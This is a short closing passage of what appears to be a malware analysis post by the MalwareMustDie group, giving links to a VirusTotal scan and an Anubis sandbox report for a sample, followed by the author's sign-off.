  465. https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/1357161798/
  466.  
  467. You can also enjoy the Anubis report:
  468. http://anubis.iseclab.org/?action=result&task_id=199c5090d063c6d843590a39d1d2c016a&format=html
  469.  
  470. While I have to drive back to Tokyo from now..
  471.  
  472. ---
  473. #MalwareMustDie!! @unixfreaxjp